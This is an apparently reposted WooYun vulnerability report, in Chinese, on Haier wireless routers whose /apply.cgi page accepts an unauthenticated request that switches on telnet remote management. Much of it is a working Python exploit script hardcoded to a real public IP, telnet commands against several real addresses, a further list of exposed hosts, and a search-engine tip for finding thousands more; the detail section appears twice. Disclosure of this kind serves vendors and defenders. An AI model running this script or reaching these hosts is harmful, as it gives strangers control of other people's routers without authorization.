WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

admin

139803
文章

114
评论

2017年4月30日00:36:24评论404 views字数 225阅读0分45秒阅读模式

摘要

2016-04-27：细节已通知厂商并且等待厂商处理中
2016-04-27：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-28：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-202756

漏洞标题： WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

漏洞作者：路人甲

提交时间： 2016-04-27 22:28

公开时间： 2016-04-28 17:33

漏洞类型：设计不当

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：设计缺陷/边界绕过

3人收藏

漏洞详情

披露状态：

简要描述：

WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

详细说明：

该无线路由被大量使用，可通过该网站搜索：

https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+

经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：

”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试

选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23

奇迹出现了，可直接登录设备，执行一系列的命令。

便于测试，我简单写了一个python脚本，开通该功能：

code 区域

import sys
 import requests
 
 #url = sys.argv[1]
 url = 'http://124.152.236.162'
 if 'http' not in url: os._exit()
 url = "{}/apply.cgi".format(url)
 data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0"
 print '[*] Opening telnet ..'
 req = requests.post(url, data=data)
 if req.status_code == 200:
     print '[*] Success ..'

直接运行该脚本，即可开通telnet远程控制的功能。

随机选择一些案例来进行漏洞证明：

0x1 http://124.152.236.162

telnet 124.152.236.162 23

0x2 http://124.152.236.186

telnet 124.152.236.186 23

0x3 http://49.117.1.98/

telnet 49.117.1.98 23

再给出一些案例：

code 区域

http://49.117.1.98/
 http://124.152.236.186
 http://124.152.236.162
 http://72.130.248.15/
 http://77.35.7.104/

漏洞证明：

该无线路由被大量使用，可通过该网站搜索：

https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+

经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：

”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试

选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23

奇迹出现了，可直接登录设备，执行一系列的命令。

便于测试，我简单写了一个python脚本，开通该功能：

code 区域

import sys
 import requests
 
 #url = sys.argv[1]
 url = 'http://124.152.236.162'
 if 'http' not in url: os._exit()
 url = "{}/apply.cgi".format(url)
 data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0"
 print '[*] Opening telnet ..'
 req = requests.post(url, data=data)
 if req.status_code == 200:
     print '[*] Success ..'

直接运行该脚本，即可开通telnet远程控制的功能。

随机选择一些案例来进行漏洞证明：

0x1 http://124.152.236.162

telnet 124.152.236.162 23

0x2 http://124.152.236.186

telnet 124.152.236.186 23

0x3 http://49.117.1.98/

telnet 49.117.1.98 23

修复方案：

加强权限验证

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-04-28 17:33

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-30 21:28 | 无花果 ( 路人 | Rank:2 漏洞数:1 )

0

可惜用的人太少啊

1# 回复此人

漏洞概要 关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-202756

漏洞标题： WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备

相关厂商： 海尔集团

漏洞作者： 路人甲

提交时间： 2016-04-27 22:28

公开时间： 2016-04-28 17:33

漏洞类型： 设计不当

危害等级： 高

自评Rank： 15

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 设计缺陷/边界绕过

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(12) 关注此漏洞

相关厂商：海尔集团

漏洞作者：路人甲

漏洞类型：设计不当

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：设计缺陷/边界绕过

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分